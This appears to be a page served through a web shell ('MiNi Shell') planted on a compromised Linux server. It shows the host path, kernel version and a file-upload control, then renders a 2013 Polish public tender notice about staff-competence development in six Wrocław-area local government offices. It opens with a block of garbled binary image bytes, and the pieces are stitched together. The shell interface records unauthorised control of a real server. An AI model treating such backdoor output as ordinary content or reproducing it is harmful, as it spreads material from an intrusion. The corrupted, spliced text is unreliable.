JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130114/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130114/19146-N-2013.html

<p class="kh_header"><b>Wrocław: Wdrożenie systemu rozwoju kompetencji kadr w 6 Jednostkach Samorządu Terytorialnego</b><br>
<b>Numer ogłoszenia: 19146 - 2013; data zamieszczenia: 14.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rozwoju Aglomeracji Wrocławskiej Spółka Akcyjna , pl. Solny 14, 50-062 Wrocław, woj. dolnośląskie, tel. 71 783 53 10, faks 71 783 53 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.araw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wdrożenie systemu rozwoju kompetencji kadr w 6 Jednostkach Samorządu Terytorialnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wdrożenie systemu rozwoju kompetencji kadr opartego na wcześniejszym badaniu luk kompetencyjnych i potrzeb szkoleniowych pracowników 6 Jednostkach Samorządu Terytorialnego (JST) w ramach projektu Wdrażanie usprawnień zarządczych w partnerstwie dolnośląskich JST współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej).

1.	Przedmiotem zamówienia jest usługa polegająca na wdrożeniu systemu rozwoju kompetencji kadry w 6 JST: 
a)	Starostwo Powiatowe w Złotoryi - 57 stanowisk urzędniczych
b)	Urząd Gminy w Wiszni Małej - 32 stanowiska urzędnicze
c)	Urząd Gminy w Kostomłotach - 25 stanowisk urzędniczych
d)	Urząd Gminy w Czernicy - 38 stanowisk urzędniczych
e)	Urząd Gminy w Długołęce - 103 stanowiska urzędnicze
f)	Urząd Miasta w Siechnicach - 74 stanowiska urzędnicze.

2.	Przedmiot zamówienia podzielony jest na 5 zadań:
a)	Zadanie I - Audyt diagnozujący opisy co najmniej 329 stanowisk pracy w 6 JST. Zamawiający dopuszcza zmniejszenie lub zwiększenie liczby stanowisk, jeśli będzie ona wynikała ze zamian kadrowych w poszczególnych Urzędach (?10 stanowisk).
W ramach zadania Wykonawca przeprowadzi:
Analizę dokumentacji i opisów stanowisk pracowniczych w Urzędach poprzez zapoznanie się ze strukturą organizacyjną Urzędu na podstawie dokumentacji przekazanej przez Urząd oraz poprzez przygotowanie założeń do systemu oceny kompetencji pracowników (przygotowanie procedury oraz wybór odpowiednich narzędzi i metod).
Analizę specyfiki pracy urzędników na stanowiskach poprzez zapoznanie się z zakresami czynności pracowników.
Opracowanie profili kompetencyjnych poprzez określenie kluczowych kompetencji i ich poziomu wymaganego dla właściwej realizacji poszczególnych zadań.
Podsumowaniem Zadania I są 2 raporty z opracowanymi profilami kompetencyjnymi odpowiednio dla struktury JST - 1 dla Powiatu i 1 dla Gminy).

b)	Zadanie II - Ocena wiedzy i umiejętności pracowników z 6 JST.
W ramach Zadania Wykonawca przeprowadzi ocenę wiedzy i umiejętności na próbie co najmniej 160 pracowników z 6 JST, dobranych proporcjonalnie do liczby stanowisk urzędniczych w poszczególnych Urzędach, z czego 20 % będą stanowili kierownicy. 
Ocena wiedzy i umiejętności zostanie przeprowadzona w sposób testowy. 
Podsumowaniem Zadania II jest sprawozdanie z jego przeprowadzenia. 

c)	Zadanie III - Przygotowanie raportu podsumowującego badania jakościowe dla każdej z 6 JST.

W ramach zadania Wykonawca przygotuje 6 raportów podsumowujących  badania jakościowe zawierających wyniki badania kompetencji kadr poprzez:
Wskazanie luk kompetencyjnych pracowników (rozbieżności kompetencji rzeczywistych i wymaganych na danym stanowisku pracy) zgodnie z przeprowadzonym opisem profili kompetencyjnych 
Rekomendacje do prowadzenia szkoleń dla pracowników z konkretnych zakresów tematycznych w dłuższej perspektywie czasu (co najmniej 2 lata).

d)	Zadanie IV - Opracowanie modelu rozwoju kompetencji kadr i wdrożenie systemu w każdej z 6 JST.
W ramach powyższego zadania Wykonawca powinien zaproponować model rozwoju kompetencji kadr oraz jego wdrożenie dla każdej z 6 JST, uwzględniając:
Metodologię budowy i rozwoju kompetencji kadr dopasowanej do specyfiki każdego Urzędu z uwzględnieniem potrzeb szkoleniowych pracowników.
Metodologię weryfikacji kompetencji i luk kompetencyjnych pracowników.
Model wypełniania zdiagnozowanych luk kompetencyjnych w oparciu o odpowiednie szkolenia, a także model systematycznej ścieżki awansu i rozwoju dotychczasowych pracowników zgodnie z Zasadą Równości Szans Kobiet i Mężczyzn.

e)	Zadanie V - Przeprowadzenie szkolenia przedstawicieli kierowników oraz osób odpowiedzialnych za procesy kadrowe z 6 JST.
W ramach powyższego zadania Wykonawca ma za zadanie przeszkolić co najmniej 10 pracowników z 6 JST (szkolenie: 1 grupa x 8 godz.) w zakresie:
Sporządzania modelowych profili kompetencyjnych
Przeprowadzania rekrutacji pracowników
Przeprowadzania audytów kompetencyjnych
Okresowych ocen pracowników.
Uczestnicy szkolenia zostaną zrekrutowani zgodnie z Zasadą Równości Szans Kobiet i Mężczyzn. 
Podsumowaniem Zadania V będzie sprawozdanie ze szkolenia.

3.	Pozostałe warunki zamówienia: 	
a)	Termin wykonania zamówienia: do dnia 12 lipca 2013 roku.
Zadanie I  - do dnia 31 marca 2013 roku.
Zadanie II - do dnia 30 kwietnia 2013 roku.
Zadanie III - do dnia 31 maja 2013 roku.
Zadanie IV - do dnia 30 czerwca 2013 roku.
Zadanie V - do dnia 12 lipca 2013 roku.

b)	Warunki szkolenia:
Wykonawca zapewnia salę, poczęstunek (kawa, herbata, ciastka, woda), sprzęt audiowizualnego oraz  inne pomoce i materiały niezbędne do przeprowadzenia szkolenia, gdy te okażą się potrzebne. Szkolenie zostanie zrealizowane we Wrocławiu lub w innym miejscu oraz terminie uzgodnionymi  przez Wykonawcę z przedstawicielami Urzędów. 
Wykonawca przekaże Zamawiającemu na 4 tygodnie przed terminem rozpoczęcia szkolenia w formie elektronicznej do akceptacji plan szkoleniowy zawierający zakres merytoryczny szkolenia. Po zakończeniu szkolenia Wykonawca przekaże Zamawiającemu sprawozdanie ze szkolenia. Wzór sprawozdania Zamawiający dostarczy Wykonawcy w terminie 2 tygodni od podpisania Umowy.
Wykonawca przekaże uczestnikom szkolenia przed jego rozpoczęciem następujące formularze do wypełniania: deklarację uczestnictwa w szkoleniu, oświadczenie o wyrażeniu zgody na przetwarzanie danych osobowych oraz listę obecności oraz przeprowadzani wśród uczestników ankietę ewaluacyjną na końcu szkolenia. Wzory tych dokumentów Zamawiający przekaże Wykonawcy w terminie dwóch tygodni liczonych od dnia podpisania Umowy. Przetwarzanie danych osobowych reguluje odrębna zawarta z Wykonawcą umowa.
Wykonawca przekaże Zamawiającemu po zakończeniu szkolenia oryginały dokumentacji szkoleniowej: listę obecności, deklaracje uczestnictwa w projekcie, oświadczenia o wyrażeniu zgody na przetwarzanie danych osobowych, ankiety ewaluacyjne oraz potwierdzone za zgodność z oryginałem kopie wydanych uczestnikom szkolenia zaświadczeń.

c)	Inne warunki:
Wytyczne EFS: Wszystkie opracowane dokumenty oraz sale szkoleniowe zostaną oznakowane zgodnie z aktualnymi wytycznymi  dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki i przekazane Zamawiającemu w formie elektronicznej. 
Wykonawca po zakończeniu poszczególnych zadań przekaże Zamawiającemu do dokumentacji Projektu w formie elektronicznej kopie 2 raportów z opracowanymi profilami kompetencyjnymi odpowiednimi dla struktury JST (powiatu i gminy), kopie 6 raportów podsumowujących wyniki badania kompetencji kadr, kopie modelu rozwoju kompetencji kadr wraz z uwierzytelnionymi kopiami protokołów odbioru przez przedstawicieli właściwych Urzędów.
Wykonawca zrealizuje przedmiot zamówienia w sposób niepowodujący dezorganizacji pracy w Urzędach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z postanowieniami art. 67 ust. 1 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.20.00.00-4, 79.41.40.00-9, 79.63.30.00-0, 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości 1.000,00 zł (słownie: jeden tysiąc złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. Wykonawca musi wykazać, iż w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał usługę: 
- polegającą na przeprowadzeniu audytu kompetencji pracowniczych i menedżerskich w minimum trzech instytucjach
- polegającą na ocenie wiedzy i umiejętności min. 300 pracowników, w tym min. 100 pracowników z jednej instytucji
Zamawiający uzna warunki za spełnione, jeśli Wykonawca załączy do oferty  dokumenty potwierdzające powyższe doświadczenie, podając: zakres, daty wykonania i odbiorców. Ocena spełnienia każdego w/w warunku będzie dokonywana metodą 0-1 tj. spełnia / nie spełnia.
b. Wykonawca musi wykazać, iż w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał usługę polegającą na wdrożeniu systemu rozwoju kompetencji kadr lub równoważnego w co najmniej trzech jednostkach dla co najmniej 300 pracowników.
Zamawiający uzna warunek za spełniony, jeśli Wykonawca załączy do oferty  dokumenty potwierdzające powyższe doświadczenie, podając: zakres, daty wykonania i odbiorców. Ocena spełnienia w/w warunku będzie dokonywana metodą 0-1 tj. spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż dysponuje dostępem do platformy informatycznej, umożliwiającej realizację w sposób zdalny części przedmiotu zamówienia, np. oceny wiedzy i umiejętności pracowników.

Powyższa platforma powinna zapewniać bezpieczne połączenie, korzystającym z niej osób poprzez zabezpieczenie platformy protokołem SSL.

Zamawiający uzna warunek za spełniony, jeśli Wykonawca załączy do oferty  oświadczenie potwierdzające spełnienie powyższego warunku. Ocena spełnienia warunku będzie dokonywana metodą 0-1 tj. spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż wszystkie osoby, które będą realizować przedmiot zamówienia:
- posiadają wykształcenie wyższe.
- w ostatnich trzech latach przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, posiadają doświadczenie we wdrażaniu systemu rozwoju kompetencji kadr lub równoważnego.
Zamawiający uzna warunek za spełniony, jeśli Wykonawca załączy do oferty  oświadczenie potwierdzające powyższe doświadczenie na wzorze, który stanowi załącznik nr 4 niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada opłaconą polisę ubezpieczeniową, a w przypadku jej braku inny dokument   potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności związanej z przedmiotem zamówienia tj. polisę (lub inny ww. dokument), opiewającą na kwotę nie mniejszą niż 100.000,00 zł.
Zamawiający uzna warunek za spełniony, jeśli Wykonawca załączy do oferty  dokumenty potwierdzające powyższe doświadczenie w postaci: opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Ilość osób dedykowanych do pracy przy realizacji przedmiotu zamówienia - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, iż w oparciu o art. 144 ustawy PZP przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
a. Zmiana sposobu rozliczania umowy, lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu, lub wytycznych dotyczących realizacji projektu.  
b. W sytuacji zmiany terminów realizacji umowy.
c. W sytuacji zmniejszenia zakresu rzeczowego umowy na skutek okoliczności, których nie można było przewidzieć na etapie przygotowywania umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie udokumentowane poniesione już koszty tego zakresu rzeczowego.
d. W sytuacji zmiany osób wyznaczonych do realizacji zadania (wykonania określonych części zamówienia) przez Wykonawcę.
e. Zachodzi konieczność zmiany w zakresie podwykonawstwa, za uprzednią zgodą Zamawiającego. Możliwe jest powierzenie podwykonawcom innego zakresu części zamówienia niż wskazany w ofercie Wykonawcy, a także możliwa jest zmiana podwykonawcy na etapie realizacji zamówienia, o ile jest to zgodne z postanowieniami SIWZ w zakresie warunku postawionego osobom bezpośrednio wykonującym zmówienie.
f. Zmiany unormowań prawnych powszechnie obowiązujących, które będą miały wpływ na realizację umowy, w tym w szczególności zmiana obowiązującej stawki VAT . 
g. Zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy - dopuszcza się zmianę osób  przedstawionych w ofercie jedynie w uzasadnionych przez Wykonawcę przypadkach oraz za uprzednią pisemną zgodą Zamawiającego, o ile jest to zgodne z postanowieniami SIWZ w zakresie warunku postawionego osobom bezpośrednio wykonującym zmówienie.
h. Jeśli w ramach wykazania spełniania warunku wiedzy i doświadczenia Wykonawca korzysta  z zasobów podmiotu trzeciego, który będzie brał udział w realizacji części zamówienia jako podwykonawca - Zamawiający dopuszcza możliwość zmiany takiego podwykonawcy jeśli wykaże on, że posiada co najmniej takie doświadczenie jakie wymagane było dla spełnienia warunku wiedzy i doświadczenia.
i. Niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego lub jest konieczna w celu prawidłowego wykonania umowy.
j. W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy  i mających charakter zmian nieistotnych tj. nie odnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona.   
k. Gdy zmiany są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.araw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.araw.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2013 godzina 12:00, miejsce: Agencja Rozwoju Aglomeracji Wrocławskiej S.A.
pl. Solny 14
50-062 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu - Wdrażanie usprawnień zarządczych w partnerstwie dolnośląskich JST..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com